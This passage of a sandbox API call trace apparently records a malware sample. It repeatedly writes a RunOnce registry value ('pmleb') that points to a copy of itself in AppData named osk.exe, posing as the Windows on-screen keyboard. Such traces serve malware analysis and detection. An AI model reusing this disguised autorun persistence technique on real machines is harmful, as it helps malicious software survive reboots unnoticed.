lpUsedDefaultChar=0x0) returned 61 [0092.080] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.081] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.081] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.081] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.081] RegCloseKey (hKey=0x280) returned 0x0 [0092.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.081] SetTimer (hWnd=0x20280, nIDEvent=0x21e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e7 [0092.082] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.092] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.092] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.092] KillTimer (hWnd=0x20280, uIDEvent=0x21e7) returned 1 [0092.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.093] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.093] IUnknown:Release (This=0x787518) returned 0x1 [0092.093] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.093] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.093] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.094] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.094] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0092.094] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.094] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0092.094] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.095] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0092.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.095] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.095] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.095] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.096] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.096] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.096] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.096] RegCloseKey (hKey=0x280) returned 0x0 [0092.096] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.096] SetTimer (hWnd=0x20280, nIDEvent=0x21e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e8 [0092.096] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.108] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.108] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.108] KillTimer (hWnd=0x20280, uIDEvent=0x21e8) returned 1 [0092.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.108] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.109] IUnknown:Release (This=0x787518) returned 0x1 [0092.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.109] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.109] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.110] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.110] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0092.110] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.110] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0092.110] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.111] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0092.111] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.111] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.111] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.111] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.111] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.111] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.112] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.112] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.112] RegCloseKey (hKey=0x280) returned 0x0 [0092.112] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.112] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.112] SetTimer (hWnd=0x20280, nIDEvent=0x21e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e9 [0092.112] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.124] KillTimer (hWnd=0x20280, uIDEvent=0x21e9) returned 1 [0092.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.124] IUnknown:Release (This=0x787518) returned 0x1 [0092.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.125] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.125] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0092.125] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.125] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0092.126] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.126] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0092.127] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.127] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.127] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.127] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.127] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.127] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.127] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.127] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.127] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.127] RegCloseKey (hKey=0x280) returned 0x0 [0092.128] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.128] SetTimer (hWnd=0x20280, nIDEvent=0x21ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ea [0092.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.139] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.140] KillTimer (hWnd=0x20280, uIDEvent=0x21ea) returned 1 [0092.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.140] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 